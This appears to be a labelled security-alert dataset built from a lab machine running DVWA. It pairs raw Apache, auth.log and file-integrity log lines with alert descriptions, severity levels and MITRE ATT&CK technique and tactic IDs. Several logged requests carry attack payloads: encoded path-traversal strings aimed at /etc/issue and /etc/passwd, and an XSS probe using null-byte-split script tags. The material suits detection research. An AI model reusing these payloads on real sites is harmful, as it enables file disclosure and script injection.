192.168.204.1 - - [06/Oct/2023:01:21:15 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%u2215%2e%2e%01%u2215%2e%2e%01%u2215%2e%2e%01%u2215%2e%2e%01%u2215%2e%2e%01%u2215etc%u2215issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:20:25 +0500] "GET /DVWA/login.php?Login=<%00script>alert(219);</script%00>&Login=Login HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/auth.log
Oct 18 23:48:07 sohaib-virtual-machine sudo: sohaib : TTY=pts/3 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "IX39QdjX"; file /snap/gnome-42-2204/141/usr/lib/x86_64-linux-gnu/libcurl.so.4.7.0; printf "command_done_%s" "OjQFLZC_"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2314020258/b025/go_asm.h' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:05 +0500] "GET /DVWA/dvwa/includes/info.php HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:43 +0500] "GET /forum/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:15 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
syscheck
File '/boot/grub/x86_64-efi/load.cfg' modified Mode: scheduled Changed attributes: mtime Old modification time was: '1696137075', now it is '1697479755'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]